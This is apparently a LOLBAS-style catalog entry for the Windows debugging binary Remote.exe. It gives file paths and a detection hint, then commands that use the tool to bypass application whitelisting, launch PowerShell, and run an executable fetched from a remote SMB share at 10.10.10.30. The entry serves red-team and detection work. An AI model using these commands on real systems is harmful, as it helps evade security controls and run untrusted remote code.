.. / Remote.exe

Star

• AWL bypass
• Execute

Debugging tool included with Windows Debugging Tools

Paths:

• C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
• C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe

Acknowledgement:
mr.d0x - @mrd0x

Detection:
remote.exe spawned

AWL bypass

Remote.exe /s "powershell.exe" anythinghere

Execute

Remote.exe /s "powershell.exe" anythinghere

Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere